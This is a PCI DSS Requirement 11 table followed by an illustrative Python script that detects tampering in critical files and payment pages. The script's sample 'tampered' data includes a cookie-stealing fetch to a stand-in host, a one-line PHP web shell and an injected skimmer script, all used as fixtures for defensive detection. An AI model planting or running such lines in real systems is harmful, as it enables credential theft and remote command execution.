| Requirement | Sub-requirements | | | |
|---|---|---|---|---|
| 11.1 Processes and mechanisms for regularly testing security of systems and networks are defined and understood. | 2 | | | |
| 11.1.1 All security policies and operational procedures identified in Requirement 11 are documented, kept up to date, in use, and known to all affected parties. | | | | |
| 11.1.2 Roles and responsibilities for performing activities in Requirement 11 are documented, assigned, and understood. | | | | |
| 11.2 Wireless access points are identified and monitored, and unauthorized wireless access points are addressed. | 2 | | | |
| 11.2.1 Authorized and unauthorized wireless access points are managed. | | | | |
| 11.2.2 An inventory of authorized wireless access points is maintained, including a documented business justification. | | | | |
| 11.3 External and internal vulnerabilities are regularly identified, prioritized, and addressed. | 2 | | | |
| 11.3.1 Internal vulnerability scans are performed. | 3 | | | |
| 11.3.1.1 All other applicable vulnerabilities (those not ranked as high-risk or critical) are managed. | | | | |
| 11.3.1.2 Internal vulnerability scans are performed via authenticated scanning. | | | | |
| 11.3.1.3 Internal vulnerability scans are performed after any significant change. | | | | |
| 11.3.2 External vulnerability scans are performed. | 1 | | | |
| 11.3.2.1 External vulnerability scans are performed after any significant change. | | | | |
| 11.4 External and internal penetration testing is regularly performed, and exploitable vulnerabilities and security weaknesses are corrected. | 7 | | | |
| 11.4.1 A penetration testing methodology is defined, documented, and implemented by the entity. | | | | |
| 11.4.2 Internal penetration testing is performed. | | | | |
| 11.4.3 External penetration testing is performed. | | | | |
| 11.4.4 Exploitable vulnerabilities and security weaknesses found during penetration testing are corrected. | | | | |
| 11.4.5 If segmentation is used to isolate the CDE from other networks, penetration tests are performed on segmentation controls. | | | | |
| 11.4.6 Additional requirement for service providers only: if segmentation is used to isolate the CDE from other networks, penetration tests are performed on segmentation controls at least once every six months. | | | | |
| 11.4.7 Multi-tenant service providers support their customers for external penetration testing per Requirements 11.4.3 and 11.4.4. | | | | |
| 11.5 Network intrusions and unexpected file changes are detected and responded to. | 2 | | | |
| 11.5.1 Intrusion-detection and/or intrusion-prevention techniques are used to detect and/or prevent intrusions into the network. | 1 | | 1 | |
| 11.5.1.1 Additional requirement for service providers only: intrusion-detection and/or intrusion-prevention techniques detect, alert on/prevent, and address covert malware communication channels. | | | 1 | |
| 11.5.2 A change-detection mechanism (for example, file integrity monitoring tools) is deployed. | | | 1 | |
| 11.6 Unauthorized changes on payment pages are detected and responded to. | 1 | | | |
| 11.6.1 A change- and tamper-detection mechanism is deployed. | | | 1 | |
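Requirements 11.5.2 and 11.6.1 both come down to the same engineering pattern: record a trusted baseline, re-measure, and alert on drift. The script below is an added illustration of that pattern, not text or tooling from the PCI DSS standard or the PCI SSC. One generic comparison routine is applied twice: to SHA-256 hashes of critical files (11.5.2), and to a fingerprint of a payment page that covers external script URLs, inline script bodies, and the security headers as received by the browser (11.6.1). The file paths, page HTML, header values and the injected skimmer are all constructed sample data.

```python
"""Baseline-and-compare change detection for critical files (PCI DSS 11.5.2)
and for payment-page scripts and headers (11.6.1). All inputs below are
constructed samples; this is illustrative code, not PCI SSC tooling."""
import hashlib
import re


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def compare_baseline(baseline: dict, current: dict) -> dict:
    """Generic drift report: keys that appeared, disappeared or changed value.
    Reused unchanged for file hashes and for page fingerprints."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


# 11.5.2: file integrity monitoring over critical files.
def file_baseline(files: dict) -> dict:
    """path -> SHA-256 of content. In production the dict comes from walking
    the monitored directories; here the contents are supplied in memory."""
    return {path: sha256_hex(content) for path, content in files.items()}


# 11.6.1: fingerprint the parts of a payment page a skimmer would change.
SCRIPT_RE = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_RE = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
WATCHED_HEADERS = ("content-security-policy", "strict-transport-security",
                   "x-frame-options")


def page_fingerprint(html: str, headers: dict) -> dict:
    """External scripts keyed by URL, inline scripts keyed by content hash
    (so one injected script reports as a single 'added' entry instead of
    shifting every index), plus the watched security headers as received."""
    fp = {}
    for attrs, body in SCRIPT_RE.findall(html):
        src = SRC_RE.search(attrs)
        if src:
            fp[f"script:src:{src.group(1)}"] = "external"
        else:
            fp[f"script:inline:{sha256_hex(body.strip().encode())}"] = "inline"
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in WATCHED_HEADERS:
        fp[f"header:{name}"] = lowered.get(name, "<missing>")
    return fp


# Constructed samples: a clean snapshot and a tampered one.
GOOD_FILES = {
    "/var/www/checkout/app.js": b"window.checkout = {};",
    "/var/www/checkout/index.html": b"<html>...</html>",
}
TAMPERED_FILES = {
    "/var/www/checkout/app.js": b"window.checkout = {}; fetch('//evil.invalid/?c='+document.cookie)",
    "/var/www/checkout/index.html": b"<html>...</html>",
    "/var/www/checkout/.tmp.php": b"<?php system($_GET['c']); ?>",
}
GOOD_PAGE = """<html><head>
<script src="https://pay.example.com/static/checkout.js"></script>
<script>initCheckout({amount: 0});</script>
</head><body>...</body></html>"""
GOOD_HEADERS = {"Content-Security-Policy": "script-src 'self'",
                "Strict-Transport-Security": "max-age=63072000",
                "X-Frame-Options": "DENY"}
# Skimmer scenario: one extra external script, and the CSP header stripped.
TAMPERED_PAGE = GOOD_PAGE.replace(
    "</head>",
    '<script src="https://cdn.analytics-helper.invalid/s.js"></script></head>')
TAMPERED_HEADERS = {"Strict-Transport-Security": "max-age=63072000",
                    "X-Frame-Options": "DENY"}


def file_drift() -> dict:
    return compare_baseline(file_baseline(GOOD_FILES), file_baseline(TAMPERED_FILES))


def page_drift() -> dict:
    return compare_baseline(page_fingerprint(GOOD_PAGE, GOOD_HEADERS),
                            page_fingerprint(TAMPERED_PAGE, TAMPERED_HEADERS))


if __name__ == "__main__":
    print("11.5.2 file drift:", file_drift())
    print("11.6.1 page drift:", page_drift())
```

Keying inline scripts by their hash rather than by position is the detail that matters in practice: a real skimmer is usually one appended script, and an index-based fingerprint would report every later script as modified and bury the finding. For 11.6.1 the fingerprint must be taken from the page as a consumer browser receives it (including headers), which is why the function accepts the response headers alongside the HTML rather than hashing files on the web server.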